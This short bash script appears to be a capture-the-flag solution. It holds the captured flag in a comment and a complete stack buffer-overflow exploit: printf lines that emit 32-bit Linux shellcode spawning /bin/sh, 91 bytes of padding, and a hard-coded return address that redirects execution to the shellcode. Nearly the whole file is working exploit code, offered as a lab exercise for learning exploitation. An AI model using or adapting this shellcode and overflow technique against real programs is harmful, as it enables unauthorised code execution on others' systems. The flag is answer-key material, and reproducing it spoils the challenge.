15 lines
427 B
Bash
15 lines
427 B
Bash
|
#!/bin/bash
|
||
|
|
||
|
# flag{THAT_WAS_EASY_HUH}
|
||
|
|
||
|
######### Exploit #########
|
||
|
# Step 1: Write the provided shellcode to stdout
|
||
|
printf "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"
|
||
|
|
||
|
# Step 2: Fill the buffer with 'A's until the stored EIP is reached
|
||
|
printf "A%.0s" {1..91}
|
||
|
|
||
|
# Step 3: Overwrite the stored EIP with the address of the shellcode
|
||
|
printf "\x2c\xd5\xff\xff"
|
||
|
###########################
|